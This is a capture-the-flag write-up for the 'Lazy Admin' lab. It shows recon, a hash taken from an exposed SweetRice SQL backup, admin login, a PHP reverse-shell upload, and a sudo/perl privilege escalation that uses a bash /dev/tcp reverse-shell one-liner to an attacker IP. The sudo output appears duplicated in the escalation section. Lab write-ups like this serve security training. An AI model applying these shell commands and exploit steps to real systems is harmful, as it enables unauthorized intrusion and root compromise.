Lazy Admin

Room Covers:

• Service Discovery

• Finding Vulnerabilities

• Exploitation

• Privilege Escalation

Target Details

• IP: 10.10.209.190

Service Discovery

• Using nmap

  nmap -sV -sC -Pn -oN nmap.txt 10.10.209.190

• Services Discovered

  Service	Port	Version
  SSH	22	OpenSSH 7.2p2
  HTTP	80	Apache httpd 2.4.18

• Finding Directories on HTTP server using GoBuster

  gobuster dir -u http://10.10.209.190/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt

  Directories Discovered: /content

• On visiting /content page, the server's using Basic CMS with Sweet Rice installed

Finding Vulnerabilities

• From 1st vulnerability, after visting /content/inc/mysql_backup/ link we get SQL database file, from where we get username and password hash, which can be easily cracked online using various tools such as crackstation

  username	password hash	password
  manager	42f749ade7f9e195bf475f37a44cafcb	Passwordxxx

  we don't know login page yet!

• Moving to parent directory /content/inc/, we get access to all the files , from where we get Sweet Rice version /content/inc/lastest.txt which is 1.5.1

• On Searching for Sweet Rice 1.5.1 vulnerabilities on Search Engine, it leads to File Upload

• On reading the exploit, we get the admin page link as /as but admin page is different which is /content/as

• Visit /content/as with the admin credentials above

• We can add custom php code from ADS tab

• TL;DR;

  Service	Vulnerability
  Sweet Rice	Backup Disclosure
  Sweet Rice 1.5.1	File Upload

Exploitation

• Create an evil reverse shell adversitement

• Using PentestMonkey php reverse shell template, we can get access to shell, by chaning ip variable to our attacker's vpn ip, and then upload

• Start listener using netcat

  nc -nlvp 1234

• From content/inc/ads/ we can execute the uploaded reverse shell

• We have access to the shell

  listening on [any] 1234 ...
  connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312
  Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
   11:43:09 up  1:26,  0 users,  load average: 0.83, 0.30, 0.10
  USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  /bin/sh: 0: can't access tty; job control turned off
  
  $ sudo -l
  Matching Defaults entries for www-data on THM-Chal:
      env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
  
  User www-data may run the following commands on THM-Chal:
      (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

  We can run perl and /home/itguy/backup.pl as root

Privilege Escalation

• Finding Escalation Vectors

  listening on [any] 1234 ...
  connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312
  Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
   11:43:09 up  1:26,  0 users,  load average: 0.83, 0.30, 0.10
  USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  /bin/sh: 0: can't access tty; job control turned off
  
  $ sudo -l
  Matching Defaults entries for www-data on THM-Chal:
      env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
  
  User www-data may run the following commands on THM-Chal:
      (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

  We can run perl and /home/itguy/backup.pl as root

• Victim's shell

  # overwrite contents of copy.sh with reverse shell on port
  echo "/bin/bash -c 'exec bash -i &>/dev/tcp/[ATTACKER_VPN_IP]/4444 <&1'" > /etc/copy.sh
  
  # on attacker's machine start netcat listener session on port 4444
  # nc -nlvp 4444
  
  # execute reverse shell with sudo rights
  sudo /usr/bin/perl /home/itguy/backup.pl

• Root Shell on Attacker's machine

  nc -nlvp 4444
  listening on [any] 4444 ...
  connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 52812
  bash: cannot set terminal process group (1058): Inappropriate ioctl for device
  bash: no job control in this shell
  root@THM-Chal:/#

Get Flags

• User Flag

  cat /home/itguy/user.txt
  # THM{63e5bce9271952xxxxxxxxxxxxxxxxxx}

• Root Flag

  cat /root/root.txt
  # THM{6637f41d0177bxxxxxxxxxxxxxxxxxxx}